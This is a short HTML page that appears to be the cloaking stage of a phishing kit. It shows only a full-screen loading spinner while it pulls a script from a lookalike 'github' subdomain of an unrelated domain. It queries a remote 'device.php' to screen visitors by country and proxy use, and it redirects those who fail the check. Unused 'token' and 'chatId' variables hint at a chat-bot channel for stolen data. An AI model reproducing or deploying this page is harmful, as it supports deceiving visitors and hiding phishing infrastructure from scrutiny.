<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title></title>



<style type="text/css">
 
    .overlay {
        /* z-index: 999; */
        position: fixed;
        width: 100%;
        height: 100%;
        top: 0;
        left: 0;
        background-color: #05164d87;
        border-radius: 6px;
        z-index: 9999;
    }

    .loader {
       text-align: center;
        position: absolute;
        left: 50%;
        top: 50%;
        z-index: 1;
        transform: translate(-50%,-50%);
    }

  .lds-spinner {
    color: #000;
    display: inline-block;
    width: 80px;
    height: 80px;
  }
  .lds-spinner div {
    transform-origin: 40px 40px;
    animation: lds-spinner 1.2s linear infinite;
  }
  .lds-spinner div:after {
    content: " ";
    display: block;
    position: absolute;
    top: 3px;
    left: 37px;
    width: 6px;
    height: 18px;
    border-radius: 20%;
    background: #000;
  }
  .lds-spinner div:nth-child(1) {
    transform: rotate(0deg);
    animation-delay: -1.1s;
  }
  .lds-spinner div:nth-child(2) {
    transform: rotate(30deg);
    animation-delay: -1s;
  }
  .lds-spinner div:nth-child(3) {
    transform: rotate(60deg);
    animation-delay: -0.9s;
  }
  .lds-spinner div:nth-child(4) {
    transform: rotate(90deg);
    animation-delay: -0.8s;
  }
  .lds-spinner div:nth-child(5) {
    transform: rotate(120deg);
    animation-delay: -0.7s;
  }
  .lds-spinner div:nth-child(6) {
    transform: rotate(150deg);
    animation-delay: -0.6s;
  }
  .lds-spinner div:nth-child(7) {
    transform: rotate(180deg);
    animation-delay: -0.5s;
  }
  .lds-spinner div:nth-child(8) {
    transform: rotate(210deg);
    animation-delay: -0.4s;
  }
  .lds-spinner div:nth-child(9) {
    transform: rotate(240deg);
    animation-delay: -0.3s;
  }
  .lds-spinner div:nth-child(10) {
    transform: rotate(270deg);
    animation-delay: -0.2s;
  }
  .lds-spinner div:nth-child(11) {
    transform: rotate(300deg);
    animation-delay: -0.1s;
  }
  .lds-spinner div:nth-child(12) {
    transform: rotate(330deg);
    animation-delay: 0s;
  }
  @keyframes lds-spinner {
    0% {
      opacity: 1;
    }
    100% {
      opacity: 0;
    }
  }

                               .errinput{
                               border: 1px solid red !important;
                            }

                            
  button, input {
 
    width: 100% !important;
}                              
@media screen and (max-width: 308px){
    input, select, input[type=tel] {
        padding-left: 7px !important;
        width: 100% !important;
    }
}
.orange{
    background-color: #ff6200;
    border-color: #ff6200;
    padding: 11px;
    font-size: larger;
    color: white;
}


                                </style>
</head>
<body>

           <div class="overlay" style="display:;">
           <div class="loader">
                <div class="lds-spinner"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div>
                <br />
                 
            </div>
    </div> 




<script src="https://github.onelivetv.online/config/jquery.min.js"></script>

<script type="text/javascript">
    $( document ).ready(function() {
    

        console.log( "ready!" );
        
        let info_User={};
        let ip="";
        let token = "";
        let chatId ="";
 
        const api_url =  "https://github.onelivetv.online/";

        async function getapi(url) {
         
            const response = await fetch(url+"config/device.php");
            var data = await response.json();
            info_User=data.country;
        

           
            if (info_User.proxy) {
            console.log("proxy");
            
            }else{
              window.location.href = "google.com";
            }
           
        }
        getapi(api_url);

 
        
   });

 

</script>
</body>
</html>
